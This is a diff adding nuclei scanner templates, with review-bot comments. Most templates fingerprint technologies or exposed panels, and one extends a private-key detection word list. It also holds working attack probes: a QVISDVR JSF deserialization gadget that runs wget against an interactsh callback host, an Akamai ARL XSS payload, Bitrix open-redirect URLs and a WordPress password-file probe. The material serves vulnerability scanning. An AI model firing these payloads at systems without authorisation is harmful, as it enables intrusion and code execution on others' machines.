tags: token,file
|
tags: token,file
|
||||||
|
|
||||||
|
@ -19,4 +19,6 @@ file:
|
||||||
- "\"BEGIN DSA PRIVATE KEY\""
|
- "\"BEGIN DSA PRIVATE KEY\""
|
||||||
- "\"BEGIN EC PRIVATE KEY\""
|
- "\"BEGIN EC PRIVATE KEY\""
|
||||||
- "\"BEGIN PGP PRIVATE KEY BLOCK\""
|
- "\"BEGIN PGP PRIVATE KEY BLOCK\""
|
||||||
- "\"ssh-rsa\""
|
- "\"ssh-rsa\""
|
||||||
|
- "\"ssh-dsa\""
|
||||||
|
- "\"ssh-ed25519\""
|
||||||
|
|
|
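Review bot: The two added words `"ssh-dsa"` and `"ssh-ed25519"` are public-key type identifiers (they appear in `.pub` files, `authorized_keys` and `known_hosts`), so in a template named `Private Key Detect` at `severity: high` they will flag public keys and raise false positives; private keys of these types are stored in PEM-style blocks of the kind the existing `BEGIN ... PRIVATE KEY` words already cover. Also, `ssh-dsa` is not a key type OpenSSH emits; the DSA identifier is `ssh-dss`, so that word will never match.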
@ -0,0 +1,42 @@
|
||||||
|
id: qvisdvr-deserialization-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
author: me9187
|
||||||
|
name: QVISDVR JSF Deserialization - Remote Code Execution
|
||||||
|
severity: critical
|
||||||
|
reference: https://twitter.com/Me9187/status/1414606876575162373
|
||||||
|
tags: qvisdvr,rce,deserialization,jsf,iot
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /qvisdvr/ HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: token
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- "JSESSIONID=(.*)"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- http
|
|
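Review bot: `info` carries no `description`, and nothing in the template tells an operator that this is not a passive probe: the `javax.faces.ViewState` payload in the second request runs a `wget` callback on the target, so add a `description` that says so and explains why a `500` status combined with an interactsh `http` hit is the success signal. Minor: the `Content-Type` header on the first, body-less GET is unnecessary.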
@ -0,0 +1,31 @@
|
||||||
|
id: akamai-arl-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Open Akamai ARL XSS
|
||||||
|
author: pdteam
|
||||||
|
severity: medium
|
||||||
|
tags: akamai,xss
|
||||||
|
reference: |
|
||||||
|
- https://github.com/war-and-code/akamai-arl-hack
|
||||||
|
- https://twitter.com/SpiderSec/status/1421176297548435459
|
||||||
|
- https://warandcode.com/post/akamai-arl-hack/
|
||||||
|
- https://github.com/cybercdh/goarl
|
||||||
|
- https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
condition: and
|
||||||
|
words:
|
||||||
|
- '"><svg onload=confirm(document.domain)>'
|
||||||
|
- 'Suggestions for improving the results'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
|
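Review bot: The request path hardcodes a third party's site (`www.citysearch.com`) as the ARL origin and the first word matcher depends on a string from that site's page (`Suggestions for improving the results`), so the check will silently stop working when citysearch.com changes its page, regardless of whether the Akamai edge is still open; `info` has no `description`, so at least document that dependency, or match on something the edge itself controls. The `text/html` header matcher is what keeps the verbatim-payload word match from counting a reflection in a non-HTML response, so keep `matchers-condition: and`.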
@ -0,0 +1,23 @@
|
||||||
|
id: android-debug-database-exposed
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Android Debug Manager
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: low
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22
|
||||||
|
tags: unauth,android
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Android Debug Database</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
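Review bot: `name: Android Debug Manager` matches neither the id `android-debug-database-exposed` nor the title the word matcher looks for (`<title>Android Debug Database</title>`); the tool is Android Debug Database, so rename to `Android Debug Database Exposed`.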
@ -0,0 +1,23 @@
|
||||||
|
id: viewpoint-system-status
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ViewPoint System Status
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: low
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22
|
||||||
|
tags: status,exposures
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>ViewPoint System Status</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
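Review bot: `tags: status,exposures` uses the plural `exposures` while the other new templates in this commit tag with the singular (`tags: github,exposure`); tags are how users select template sets, so use `exposure` consistently.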
@ -0,0 +1,26 @@
|
||||||
|
id: zabbix-dashboards-access
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: zabbix-dashboards-access
|
||||||
|
author: pussycat0x
|
||||||
|
severity: medium
|
||||||
|
description: View dashboard with guest login.
|
||||||
|
reference: https://www.exploit-db.com/ghdb/5595
|
||||||
|
tags: zabbix,unauth
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/zabbix/zabbix.php?action=dashboard.list"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Create dashboard"
|
||||||
|
- "Zabbix SIA"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
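Review bot: `name: zabbix-dashboards-access` merely repeats the id; `name` is the human-readable title shown in output, so something like `Zabbix Dashboards Accessible with Guest Login`, matching the `description`, is expected. The description could also state what the finding implies (unauthenticated users can read monitoring dashboards).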
@ -0,0 +1,24 @@
|
||||||
|
id: bigbluebutton-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: BigBlueButton Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,bigbluebutton
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>BigBlueButton</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: centreon-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Centreon Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,centreon
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/centreon/index.php"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Centreon - IT & Network Monitoring</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
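Review bot: The word `<title>Centreon - IT & Network Monitoring</title>` contains a raw `&`; HTML pages commonly emit it as `&amp;`, in which case this matcher never fires. Confirm against the raw HTML source of a Centreon login page, or match the stable prefix `<title>Centreon` instead.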
@ -0,0 +1,24 @@
|
||||||
|
id: gespage-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gespage Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,gespage
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/gespage/webapp/login.xhtml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Login utilisateur Gespage</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: getsimple-cms-detector
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GetSimple CMS Detector
|
||||||
|
author: philippedelteil
|
||||||
|
severity: info
|
||||||
|
description: With this template we can detect a running GetSimple CMS instance
|
||||||
|
tags: getsimple,tech
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/readme.txt"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'GetSimple CMS is a flatfile CMS'
|
||||||
|
- type: status
|
||||||
|
part: header
|
||||||
|
status:
|
||||||
|
- 200
|
|
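Review bot: `part: header` under the `- type: status` matcher is meaningless (a status matcher compares the response code, not a response part) and should be removed. Style: the id `getsimple-cms-detector` and the description `With this template we can detect ...` break from the `*-detect` ids and impersonal descriptions used by the other tech templates in this commit (`jeedom-detect`, `itop-detect`).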
@ -0,0 +1,24 @@
|
||||||
|
id: itop-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: iTop Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,itop
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/pages/UI.php"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>iTop login</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: jeedom-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Jeedom Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,jeedom
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?v=d"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Jeedom</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: jenkins-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Jenkins detect (version)
|
||||||
|
author: philippdelteil
|
||||||
|
severity: info
|
||||||
|
tags: tech,jenkins
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "X-Jenkins"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>Sign in [Jenkins]</title>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
part: header
|
||||||
|
kval:
|
||||||
|
- x_jenkins
|
|
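Review bot: `matchers-condition: and` requires both the `X-Jenkins` header and a `<title>Sign in [Jenkins]</title>` body, so a Jenkins instance whose dashboard is readable without login (no sign-in page) will not be reported even though the header already identifies it and feeds the `x_jenkins` version extractor; `or`, or the header matcher alone, fits the stated purpose `Jenkins detect (version)`. Also, `author: philippdelteil` is spelled `philippedelteil` elsewhere in this commit (`getsimple-cms-detector`); one of the two is a typo.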
@ -0,0 +1,29 @@
|
||||||
|
id: openx-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: OpenX detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,openx
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/www/admin/"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '<title>OpenX</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'content="(.*)- http://www.openx.org">'
|
|
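Review bot: The template has two matchers (the title regex and status `200`) but no `matchers-condition: and`; nuclei's default condition is `or`, so every site that answers `/www/admin/` with a 200 will be reported as OpenX. Add `matchers-condition: and` as the other detect templates in this commit do. The title pattern `<title>OpenX</title>` contains no regex syntax, so a `word` matcher would be clearer, and the extractor `content="(.*)- http://www.openx.org">` is greedy and will capture the widest span on the line.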
@ -0,0 +1,23 @@
|
||||||
|
id: operations-automation-default-page
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Operations Automation Default Page
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
|
||||||
|
tags: tech,default
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Operations Automation Default Page</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
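Review bot: `reference:` points to a Shodan query for `ClearPass Policy Manager - Aruba Networks`, which has nothing to do with the `Operations Automation Default Page` title this template matches; it looks copy-pasted from another template, so replace it with the matching `http.title` query or drop it.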
@ -0,0 +1,25 @@
|
||||||
|
id: phpcollab-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PhpCollab detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,phpcollab
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/general/login.php"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<title>PhpCollab</title>'
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '<p id="footer">(.*)</p>'
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: wondercms-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WonderCMS Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,wondercms
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Powered by WonderCMS"
|
||||||
|
- "https://www.wondercms.com"
|
||||||
|
condition: and
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -1,4 +1,4 @@
|
||||||
id: jenkins-stack-traces
|
id: jenkins-stack-trace
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Jenkins in Debug Mode with Stack Traces Enabled
|
name: Detect Jenkins in Debug Mode with Stack Traces Enabled
|
||||||
|
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: bitrix-open-redirect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Bitrix Open URL redirect detection
|
||||||
|
author: pikpikcu
|
||||||
|
severity: low
|
||||||
|
reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
|
||||||
|
tags: redirect,bitrix
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
||||||
|
- 301
|
||||||
|
condition: or
|
|
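Review bot: Path 11 (`'{{BaseURL}}bitrix/redirect.php?event1=%D0%A1...'`) is missing the `/` after `{{BaseURL}}` and is otherwise identical to path 12, so it is a duplicate that builds a malformed URL whenever `{{BaseURL}}` has no trailing slash, which the other eleven paths assume; drop it. The `Location` regex also allows arbitrary `[a-zA-Z0-9\-_\.@]*` characters immediately before `example\.com`, so a redirect to `https://myexample.com` or `https://not-example.com` counts as a hit; require a dot before the host when a prefix is present, e.g. `(?:[a-zA-Z0-9\-_\.@]*\.)?example\.com`.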
@ -0,0 +1,29 @@
|
||||||
|
id: wordpress-upload-data
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: wordpress-upload-data
|
||||||
|
author: pussycat0x
|
||||||
|
severity: medium
|
||||||
|
description: Searches for Passwords in the wordpress uploads directory.
|
||||||
|
reference: https://www.exploit-db.com/ghdb/7040
|
||||||
|
tags: wordpress,listing
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/data.txt"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "admin:"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/plain"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
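Review bot: `name: wordpress-upload-data` repeats the id; give it a readable title (e.g. `WordPress Uploads Directory Credentials Exposure`) and have `description` say what `wp-content/uploads/data.txt` is expected to contain rather than `Searches for Passwords`. The single word `admin:` is a weak signal that the `text/plain` and `200` checks only partly compensate for, and `tags: wordpress,listing` labels a file-content check as a directory listing; `exposure` would describe it better.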